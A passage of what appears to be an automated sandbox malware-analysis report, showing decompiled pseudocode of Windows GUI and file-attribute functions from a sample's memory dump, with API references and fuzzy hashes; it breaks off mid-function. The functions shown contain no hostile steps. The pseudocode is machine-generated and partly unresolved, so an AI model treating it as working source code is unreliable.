Function 00CD12DE Relevance: 6.2, APIs: 4, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00CD12DE(intOrPtr* __ecx, void* __edx, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				signed int _t83;
				struct HWND__* _t92;
				int _t93;
				intOrPtr _t109;
				intOrPtr* _t113;
				intOrPtr _t115;
				intOrPtr _t121;
				intOrPtr _t126;
				intOrPtr _t128;
				void* _t134;
				intOrPtr _t136;
				signed int _t142;
				intOrPtr* _t143;
				signed int _t145;
				signed int _t150;
				void* _t151;

				_t134 = __edx;
				_t71 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t71 ^ _t150;
				_t113 = __ecx;
				_v44 = _a4;
				_v48 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0 || E00CCE356(__ecx) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc4)) + 0x304)) == 0) {
					_t142 = 0;
					__eflags = 0;
				} else {
					_t142 = 1;
				}
				_t136 =  *((intOrPtr*)(_t113 + 0xc4));
				if( *((intOrPtr*)(_t136 + 0x304)) == 0) {
					L9:
					if(_t142 == 0) {
						goto L21;
					} else {
						_t145 =  *(_t136 + 0x354);
						if( *((intOrPtr*)(_t136 + 0x304)) == 0) {
							_t83 = E00CCDE59(_t113) * _t145;
							__eflags = _t83;
						} else {
							_t83 = _t145;
							if( *((intOrPtr*)(_t113 + 0x6c)) != 0) {
								_t83 = 0;
							}
						}
						_v24 =  *((intOrPtr*)(_t136 + 0x328)) + _t83;
						_t126 =  *_v44;
						_v20 = _t126;
						_v16 =  *((intOrPtr*)(_t136 + 0x330));
						_v12 = _t126 + _t145;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(IsRectEmpty(_t113 + 0x40) == 0) {
							 *((intOrPtr*)(_t113 + 0x44)) =  *((intOrPtr*)(_t113 + 0x34)) + 1;
							 *((intOrPtr*)(_t113 + 0x4c)) =  *((intOrPtr*)(_t113 + 0x3c));
						}
						 *_v44 =  *_v44 +  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc4)) + 0x354));
						_t128 =  *((intOrPtr*)(_t113 + 0xc4));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v16 =  *((intOrPtr*)(_t128 + 0x358)) +  *((intOrPtr*)(_t128 + 0x328));
						_t92 = _t128 + 0x80;
						if(_t92 != 0) {
							_t92 =  *(_t92 + 0x20);
						}
						_t93 = IsWindow(_t92);
						_t166 = _t93;
						if(_t93 != 0) {
							E00D092B0( *((intOrPtr*)(_t113 + 0xc4)) - 0xffffff80, _t134, _t166,  *((intOrPtr*)(_t113 + 0xc4)), 0xffffffff,  &_v24,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc4)) + 0x340)) + 1);
							 *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc4)) + 0x340)) =  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc4)) + 0x340)) + 1;
							_t167 =  *((intOrPtr*)(_t113 + 0x5c));
							if( *((intOrPtr*)(_t113 + 0x5c)) == 0) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v40 = _v16 + 1;
								E00D092B0( *((intOrPtr*)(_t113 + 0xc4)) - 0xffffff80, _t134, _t167,  *((intOrPtr*)(_t113 + 0xc4)), 0xffffffff,  &_v40,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc4)) + 0x340)) + 1);
								 *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc4)) + 0x340)) =  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc4)) + 0x340)) + 1;
							}
						}
						goto L22;
					}
				} else {
					_t109 =  *((intOrPtr*)(_t113 + 0xc8));
					if(_t109 == 0 ||  *((intOrPtr*)(_t109 + 0x6c)) == 0 || E00CCE356(_t113) != 0) {
						goto L9;
					} else {
						L21:
						SetRectEmpty(_t113 + 0x30);
						SetRectEmpty(_t113 + 0x40);
						L22:
						_t143 =  *((intOrPtr*)(_t113 + 0xd0));
						if(_t143 == 0) {
							L26:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *0xe17a64();
							return E00DDCBCE( *((intOrPtr*)( *_t113 + 0x6c))(),  *_t113, _v8 ^ _t150, _t134, _t151 - 0x10,  &_v64);
						}
						_t115 = _v44;
						do {
							_t121 =  *((intOrPtr*)(_t143 + 8));
							_t143 =  *_t143;
							E00CD12DE(_t121, _t134, _t115);
						} while (_t143 != 0);
						_t113 = _v48;
						goto L26;
					}
				}
			}

0x00cd12de
0x00cd12e4
0x00cd12eb
0x00cd12f3
0x00cd12f5
0x00cd12fc
0x00cd1306
0x00cd1307
0x00cd1308
0x00cd1309
0x00cd130a
0x00cd1329
0x00cd1329
0x00cd1324
0x00cd1326
0x00cd1326
0x00cd132b
0x00cd1338
0x00cd1359
0x00cd135b
0x00000000
0x00cd1361
0x00cd1368
0x00cd136e
0x00cd1383
0x00cd1383
0x00cd1370
0x00cd1374
0x00cd1376
0x00cd1378
0x00cd1378
0x00cd1376
0x00cd138e
0x00cd1394
0x00cd1396
0x00cd13a2
0x00cd13a8
0x00cd13ae
0x00cd13b3
0x00cd13b4
0x00cd13b5
0x00cd13be
0x00cd13c4
0x00cd13ca
0x00cd13ca
0x00cd13e2
0x00cd13e4
0x00cd13ea
0x00cd13eb
0x00cd13ec
0x00cd13ed
0x00cd13fa
0x00cd13fd
0x00cd1405
0x00cd1407
0x00cd1407
0x00cd140b
0x00cd1411
0x00cd1413
0x00cd142d
0x00cd1438
0x00cd143e
0x00cd1442
0x00cd1453
0x00cd1455
0x00cd1456
0x00cd1457
0x00cd1458
0x00cd146d
0x00cd1478
0x00cd1478
0x00cd1442
0x00000000
0x00cd1413
0x00cd133a
0x00cd133a
0x00cd1342
0x00000000
0x00cd1480
0x00cd1480
0x00cd1484
0x00cd148e
0x00cd1494
0x00cd1494
0x00cd149c
0x00cd14b3
0x00cd14c0
0x00cd14c1
0x00cd14c2
0x00cd14c3
0x00cd14c4
0x00cd14de
0x00cd14de
0x00cd149e
0x00cd14a1
0x00cd14a1
0x00cd14a4
0x00cd14a7
0x00cd14ac
0x00cd14b0
0x00000000
0x00cd14b0
0x00cd1342

APIs

IsRectEmpty.USER32 ref: 00CD13B6
IsWindow.USER32(?), ref: 00CD140B
SetRectEmpty.USER32(?), ref: 00CD1484
SetRectEmpty.USER32(?), ref: 00CD148E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EmptyRect$Window
String ID:
API String ID: 1945993337-0
Opcode ID: fd153ba68e4217a8a9de98a984c51daf690269114ba885f888ae8d276625a032
Instruction ID: e7517ec03995f8394adf89a777edca778af9fc33e2075d9f557eadff92b12185
Opcode Fuzzy Hash: fd153ba68e4217a8a9de98a984c51daf690269114ba885f888ae8d276625a032
Instruction Fuzzy Hash: 15614D71A016059FCB15DF64C994BAA73B9FF09304F0841AAEE15AF396DB31AA05CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF35F Relevance: 6.1, APIs: 4, Instructions: 146
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00CAF35F(void* __ecx, signed int* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _FILETIME _v60;
				struct _FILETIME _v68;
				struct _FILETIME _v76;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t57;
				CHAR* _t59;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				signed int* _t78;
				signed int* _t80;
				signed int* _t82;
				void* _t85;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed int _t102;
				signed int* _t103;
				signed int _t104;
				void* _t107;

				_t101 = __edx;
				_t86 = __ecx;
				_t46 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t46 ^ _t104;
				_t103 = _a4;
				_t85 = __ecx;
				_t102 = 0;
				E00DDFBE0(0, _t103, 0, 0x128);
				E00CA4F80(_t85, _t86, 0, _t103, E00DEC22B( &(_t103[9]), 0x104,  *(_t85 + 0xc), 0xffffffff));
				_t52 =  *(_t85 + 4);
				_t107 = _t52 -  *0xe180f4; // 0xffffffff
				if(_t107 == 0) {
					L22:
					_t54 = 1;
					L23:
					return E00DDCBCE(_t54, _t85, _v8 ^ _t104, _t101, _t102, _t103);
				}
				if(GetFileTime(_t52,  &_v60,  &_v68,  &_v76) == 0) {
					L24:
					_t54 = 0;
					goto L23;
				}
				_t57 =  &_v52;
				__imp__GetFileSizeEx( *(_t85 + 4), _t57);
				if(_t57 == 0) {
					goto L24;
				}
				_t103[6] = _v52;
				_t103[7] = _v48;
				_t59 =  *(_t85 + 0xc);
				if( *((intOrPtr*)(_t59 - 0xc)) != 0) {
					_t93 =  *(_t85 + 0x10);
					if(_t93 == 0) {
						_t94 = GetFileAttributesA(_t59);
					} else {
						_t101 =  &_v44;
						E00CAF110(_t93, _t59, 0,  &_v44);
						asm("sbb ecx, ecx");
						_t94 = _t93 & _v44;
					}
					_t20 = _t94 + 1; // 0x1
					asm("sbb eax, eax");
					_t63 =  ~_t20 & _t94;
				} else {
					_t63 = 0;
				}
				_t103[8] = _t63;
				if(E00CAF619( &_v60) == 0) {
					_t95 = _t102;
					_t66 = _t102;
				} else {
					_push(0xffffffff);
					_t82 = E00CAADBB(_t85,  &_v84, _t102,  &_v60);
					_t95 =  *_t82;
					_t66 = _t82[1];
				}
				 *_t103 = _t95;
				_t103[1] = _t66;
				if(E00CAF619( &_v68) == 0) {
					_t96 = _t102;
					_t69 = _t102;
				} else {
					_push(0xffffffff);
					_t80 = E00CAADBB(_t85,  &_v84, _t102,  &_v68);
					_t96 =  *_t80;
					_t69 = _t80[1];
				}
				_t103[4] = _t96;
				_t103[5] = _t69;
				if(E00CAF619( &_v76) == 0) {
					_t97 = _t102;
				} else {
					_push(0xffffffff);
					_t78 = E00CAADBB(_t85,  &_v84, _t102,  &_v76);
					_t102 =  *_t78;
					_t97 = _t78[1];
				}
				_t103[2] = _t102;
				_t103[3] = _t97;
				if(( *_t103 | _t103[1]) == 0) {
					 *_t103 = _t102;
					_t103[1] = _t97;
				}
				if((_t103[4] | _t103[5]) == 0) {
					_t103[5] = _t97;
					_t103[4] = _t102;
				}
				goto L22;
			}

0x00caf35f
0x00caf35f
0x00caf365
0x00caf36c
0x00caf371
0x00caf374
0x00caf37c
0x00caf380
0x00caf399
0x00caf39e
0x00caf3a4
0x00caf3aa
0x00caf4c5
0x00caf4c7
0x00caf4c8
0x00caf4d6
0x00caf4d6
0x00caf3c5
0x00caf4d9
0x00caf4d9
0x00000000
0x00caf4d9
0x00caf3cb
0x00caf3d2
0x00caf3da
0x00000000
0x00000000
0x00caf3e6
0x00caf3e9
0x00caf3ec
0x00caf3f2
0x00caf3f8
0x00caf3fd
0x00caf41a
0x00caf3ff
0x00caf3ff
0x00caf405
0x00caf40c
0x00caf40e
0x00caf40e
0x00caf41c
0x00caf421
0x00caf423
0x00caf3f4
0x00caf3f4
0x00caf3f4
0x00caf425
0x00caf433
0x00caf44a
0x00caf44c
0x00caf435
0x00caf435
0x00caf43e
0x00caf443
0x00caf445
0x00caf445
0x00caf44e
0x00caf450
0x00caf45e
0x00caf475
0x00caf477
0x00caf460
0x00caf460
0x00caf469
0x00caf46e
0x00caf470
0x00caf470
0x00caf479
0x00caf47c
0x00caf48a
0x00caf4a1
0x00caf48c
0x00caf48c
0x00caf495
0x00caf49a
0x00caf49c
0x00caf49c
0x00caf4a3
0x00caf4a6
0x00caf4ae
0x00caf4b0
0x00caf4b2
0x00caf4b2
0x00caf4bb
0x00caf4bf
0x00caf4c2
0x00caf4c2
0x00000000

APIs

__cftof.LIBCMT ref: 00CAF393
GetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00CAF3BD
GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 00CAF3D2

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: File$SizeTime__cftof
String ID:
API String ID: 350740370-0
Opcode ID: 97304b49a92d5f1c93f4b505c4df2514790fce29e26fabfb93ab90be215580cd
Instruction ID: 00a192d7480431bb01d520855c4aaf78ad406f4c4fcd7b7bcce2e7bcc8168a94
Opcode Fuzzy Hash: 97304b49a92d5f1c93f4b505c4df2514790fce29e26fabfb93ab90be215580cd
Instruction Fuzzy Hash: AF515A71A006069FCB24DFA5D885CABB7F9EF49314714862EF466D7290EB30E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2CE6 Relevance: 6.1, APIs: 4, Instructions: 145
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00CE2CE6(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				long _t44;
				void* _t56;
				intOrPtr* _t78;
				intOrPtr _t90;
				void* _t102;
				intOrPtr* _t103;
				signed int _t108;

				_t38 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t38 ^ _t108;
				_t103 = _a4;
				_t78 = __ecx;
				_v28 = _t103;
				_v36 = _a8;
				if(_a12 != 2) {
					L4:
					_t106 =  *((intOrPtr*)( *_t78 + 0x188));
					 *0xe17a64(_t103);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x188))))() == 0) {
						L16:
						_t44 = 0;
						L17:
						return E00DDCBCE(_t44, _t78, _v8 ^ _t108, _t102, _t103, _t106);
					}
					_t106 =  *((intOrPtr*)( *_t103 + 0x184));
					 *0xe17a64(_t78);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t103 + 0x184))))() == 0) {
						goto L16;
					}
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					SetRectEmpty( &_v24);
					GetWindowRect( *(_t78 + 0x20),  &_v24);
					_v32 = 1;
					 *0xe17a64(0);
					_t56 =  *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x228))))();
					if(_t56 != 0) {
						_v32 =  *(_t56 + 0xa5) & 0x000000ff;
					}
					SendMessageA( *(_t103 + 0x20), 0xb, 0, 0);
					_t106 =  *((intOrPtr*)( *_t78 + 0x29c));
					 *0xe17a64(_t103, _a12);
					 *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x29c))))();
					_t90 = _a12;
					if(_t90 != 1) {
						if(_t90 == 4 || _t90 == 2) {
							_t106 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0xb8)))) + 0x274));
							 *0xe17a64(_t78, _t90, _v36);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0xb8)))) + 0x274))))();
							goto L14;
						} else {
							goto L15;
						}
					} else {
						_t106 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0xb8)))) + 0x274));
						 *0xe17a64(_t78, 1,  &_v24);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0xb8)))) + 0x274))))();
						if(_v32 != 0) {
							_t106 =  *((intOrPtr*)( *_t78 + 0x2f0));
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x2f0))))();
						}
						L14:
						_t103 = _v28;
						L15:
						SendMessageA( *(_t103 + 0x20), 0xb, 1, 0);
						L3:
						_t44 = 1;
						goto L17;
					}
				}
				_t103 =  *((intOrPtr*)(__ecx + 0x204));
				_v28 = _t103;
				if(_t103 != 0) {
					goto L4;
				}
				_t106 =  *((intOrPtr*)( *__ecx + 0x19c));
				 *0xe17a64();
				E00D3FE9A(E00D537D5(0xe6872c, _t102,  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x19c))))()), _t78, _t103, _t103);
				goto L3;
			}

0x00ce2cec
0x00ce2cf3
0x00ce2d00
0x00ce2d03
0x00ce2d05
0x00ce2d08
0x00ce2d0b
0x00ce2d4b
0x00ce2d4e
0x00ce2d56
0x00ce2d62
0x00ce2e81
0x00ce2e81
0x00ce2e83
0x00ce2e91
0x00ce2e91
0x00ce2d6b
0x00ce2d73
0x00ce2d7f
0x00000000
0x00000000
0x00ce2d87
0x00ce2d8a
0x00ce2d8d
0x00ce2d90
0x00ce2d97
0x00ce2da4
0x00ce2dae
0x00ce2dbd
0x00ce2dc5
0x00ce2dc9
0x00ce2dd2
0x00ce2dd2
0x00ce2dde
0x00ce2dea
0x00ce2df2
0x00ce2dfa
0x00ce2dfc
0x00ce2e02
0x00ce2e44
0x00ce2e58
0x00ce2e60
0x00ce2e68
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce2e04
0x00ce2e13
0x00ce2e1b
0x00ce2e23
0x00ce2e29
0x00ce2e2d
0x00ce2e35
0x00ce2e3d
0x00ce2e3d
0x00ce2e6a
0x00ce2e6a
0x00ce2e6d
0x00ce2e76
0x00ce2d43
0x00ce2d45
0x00000000
0x00ce2d45
0x00ce2e02
0x00ce2d0d
0x00ce2d13
0x00ce2d18
0x00000000
0x00000000
0x00ce2d1c
0x00ce2d24
0x00ce2d3e
0x00000000

APIs

SetRectEmpty.USER32(?), ref: 00CE2D97
GetWindowRect.USER32 ref: 00CE2DA4
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00CE2DDE
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00CE2E76

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageRectSend$EmptyWindow
String ID:
API String ID: 1914275016-0
Opcode ID: 9580cf6764d203dcdb4f9e84805883c1df8d83bb53d9e1a8ab0a0d0114631d7e
Instruction ID: b4e12f8fe875722b607683cf70f2ea091a5e9f6e429d6f69a78489f98af1938a
Opcode Fuzzy Hash: 9580cf6764d203dcdb4f9e84805883c1df8d83bb53d9e1a8ab0a0d0114631d7e
Instruction Fuzzy Hash: 26516331A002159FCF049F65CD98BAE7BF9EF48701F144069E916EB351DB34AE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CC554E Relevance: 6.1, APIs: 4, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00CC554E(void* __ebx, intOrPtr __ecx, intOrPtr _a4, struct tagRECT* _a8, signed char _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				int _t52;
				intOrPtr _t54;
				void* _t55;
				void* _t56;
				void* _t60;
				void* _t64;
				void* _t65;
				intOrPtr _t69;
				void* _t70;
				intOrPtr* _t74;
				void* _t77;
				intOrPtr _t84;
				void* _t89;
				struct tagRECT* _t90;
				struct tagRECT* _t91;
				intOrPtr _t93;
				void* _t102;

				_t93 = __ecx;
				_t50 = 0;
				_v8 = __ecx;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x80)) == 3) {
					L26:
					return InflateRect(_a8, 0xfffffffe, 0xfffffffe);
					L27:
				}
				_t102 =  *0xe870ac - _t50; // 0x0
				if(_t102 != 0) {
					_t103 =  *((intOrPtr*)(__ecx + 0xa4));
					if( *((intOrPtr*)(__ecx + 0xa4)) == 0) {
						_t74 = E00CC1A50(__ebx, _t89, __ecx, _t103);
						_v12 = _t74;
						asm("movsd");
						_v16 =  *((intOrPtr*)( *_t74 + 0x1c4));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *0xe17a64(_a4, _t93, _a12);
						_t77 = _v16();
						_t93 = _v8;
						if(_t77 == 0) {
							_t50 = _v20;
						} else {
							_t50 = 1;
						}
					}
				}
				if( *((intOrPtr*)(_t93 + 0xac)) == 0 ||  *((intOrPtr*)(_t93 + 0xb4)) == 0) {
					if((_a12 & 0x00000001) != 0 ||  *((intOrPtr*)(_t93 + 0xc0)) != 0) {
						goto L18;
					} else {
						if(_t50 != 0 ||  *((intOrPtr*)(_t93 + 0x80)) == 1 &&  *((intOrPtr*)(_t93 + 0xb4)) == _t50) {
							goto L26;
						} else {
							_t64 = E00CC19ED();
							_t65 = E00CC19ED();
							_t91 = _a8;
							E00CC0750(_t91,  *((intOrPtr*)(_t65 + 0x24)),  *((intOrPtr*)(_t64 + 0x30)));
							InflateRect(_t91, 0xffffffff, 0xffffffff);
							_t69 = _v8;
							_t84 =  *((intOrPtr*)(_t69 + 0x80));
							if(_t84 == 0 || _t84 == 2 &&  *((intOrPtr*)(_t69 + 0xb4)) != 0) {
								_t70 = E00CC19ED();
								E00CC0750(_t91,  *((intOrPtr*)(E00CC19ED() + 0x34)),  *((intOrPtr*)(_t70 + 0x20)));
							}
							return InflateRect(_t91, 0xffffffff, 0xffffffff);
							goto L27;
						}
					}
				} else {
					L18:
					__eflags = _t50;
					if(_t50 != 0) {
						_t90 = _a8;
						_push(0xfffffffe);
						_push(0xfffffffe);
					} else {
						_t55 = E00CC19ED();
						_t56 = E00CC19ED();
						_t90 = _a8;
						E00CC0750(_t90,  *((intOrPtr*)(_t56 + 0x30)),  *((intOrPtr*)(_t55 + 0x24)));
						InflateRect(_t90, 0xffffffff, 0xffffffff);
						_t93 = _v8;
						__eflags =  *((intOrPtr*)(_t93 + 0x80)) - 1;
						if( *((intOrPtr*)(_t93 + 0x80)) != 1) {
							_t60 = E00CC19ED();
							E00CC0750(_t90,  *((intOrPtr*)(E00CC19ED() + 0x20)),  *((intOrPtr*)(_t60 + 0x34)));
							_t93 = _v8;
						}
						_push(0xffffffff);
						_push(0xffffffff);
					}
					_t52 = InflateRect(_t90, ??, ??);
					__eflags =  *0xe870ac;
					if( *0xe870ac == 0) {
						L25:
						_t90->left = _t90->left +  *((intOrPtr*)(_t93 + 0xe8));
						_t54 =  *((intOrPtr*)(_t93 + 0xec));
						_t90->top = _t90->top + _t54;
						return _t54;
					} else {
						__eflags =  *((intOrPtr*)(_t93 + 0xa4));
						if( *((intOrPtr*)(_t93 + 0xa4)) == 0) {
							return _t52;
						}
						goto L25;
					}
				}
			}

0x00cc5555
0x00cc5557
0x00cc555a
0x00cc555d
0x00cc5567
0x00cc5703
0x00000000
0x00cc570a
0x00cc570a
0x00cc556d
0x00cc5573
0x00cc5575
0x00cc557b
0x00cc557d
0x00cc5585
0x00cc559e
0x00cc559f
0x00cc55a2
0x00cc55a3
0x00cc55a4
0x00cc55a5
0x00cc55ae
0x00cc55b1
0x00cc55b6
0x00cc55bd
0x00cc55b8
0x00cc55ba
0x00cc55ba
0x00cc55b6
0x00cc557b
0x00cc55c7
0x00cc55da
0x00000000
0x00cc55ed
0x00cc55ef
0x00000000
0x00cc560a
0x00cc560a
0x00cc5612
0x00cc5617
0x00cc5623
0x00cc562d
0x00cc5633
0x00cc5636
0x00cc563e
0x00cc564e
0x00cc5664
0x00cc5664
0x00000000
0x00000000
0x00cc566b
0x00cc55ef
0x00cc5673
0x00cc5673
0x00cc5673
0x00cc5675
0x00cc56d0
0x00cc56d3
0x00cc56d5
0x00cc5677
0x00cc5677
0x00cc567f
0x00cc5684
0x00cc5690
0x00cc569a
0x00cc56a0
0x00cc56a3
0x00cc56aa
0x00cc56ac
0x00cc56c2
0x00cc56c7
0x00cc56c7
0x00cc56ca
0x00cc56cc
0x00cc56cc
0x00cc56d8
0x00cc56de
0x00cc56e5
0x00cc56f0
0x00cc56f6
0x00cc56f8
0x00cc56fe
0x00000000
0x00cc56e7
0x00cc56e7
0x00cc56ee
0x00cc5713
0x00cc5713
0x00000000
0x00cc56ee
0x00cc56e5

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 00CC562D
InflateRect.USER32(?,000000FF,000000FF), ref: 00CC569A
InflateRect.USER32(?,000000FE,000000FE), ref: 00CC56D8

Part of subcall function 00CC1A50: __EH_prolog3.LIBCMT ref: 00CC1A57

InflateRect.USER32(?,000000FE,000000FE), ref: 00CC570A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: InflateRect$H_prolog3
String ID:
API String ID: 3346915232-0
Opcode ID: 6098354724965151a34f45287c07d97d006847aabefca2da70f6b99ca4d687c3
Instruction ID: cb517d688f6479b31c5a0f25d7ddaf344908a64f55f0c79cdcaccbb193a18daa
Opcode Fuzzy Hash: 6098354724965151a34f45287c07d97d006847aabefca2da70f6b99ca4d687c3
Instruction Fuzzy Hash: C3516831504614EFCB109F69C944FAA77BAAF46320F28465DF876A72E1DB30BE80DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00D21697 Relevance: 6.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00D21697(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v4;
				intOrPtr _v28;
				struct tagLOGFONTA _v76;
				struct HDC__* _v92;
				char _v96;
				intOrPtr _v168;
				char _v336;
				intOrPtr* _t53;
				void* _t62;
				intOrPtr* _t83;
				char* _t91;
				intOrPtr _t92;
				long _t111;
				intOrPtr _t112;
				char* _t115;
				void* _t122;

				_t122 = __eflags;
				_t114 = __esi;
				_t109 = __edx;
				E00DDD55F(0xe0d2b0, __ebx, __edi, __esi);
				_t111 = __ecx;
				E00CB90E5(0,  &_v96, __edx, __ecx, __esi, _t122, 0, 0x144);
				_v4 = 0;
				E00DDFBE0(__ecx,  &_v76, 0, 0x3c);
				_v76.lfCharSet =  *((intOrPtr*)(_t111 + 0xf8));
				EnumFontFamiliesExA(_v92,  &_v76, 0xd2156b, _t111, 0);
				_push(0);
				_push(0x14000c);
				_push(0);
				E00D9E113(0,  &_v336, _t111, __esi, _t122);
				_v4 = 1;
				if(E00D9DE69(0,  *((intOrPtr*)(E00CACEEE(0, _t111, _t114, _t122) + 4)), _t109, _t111, _v168) == 0) {
					L3:
					_v336 = 0xe1aed0;
					E00CBCFC2(0,  &_v336, _t109);
					E00CB9360( &_v96);
					return E00DDD50E(0, _t111, _t114);
				} else {
					_t91 =  &_v336;
					_t114 = E00D9E2DB(_t91);
					if(_t114 == 0) {
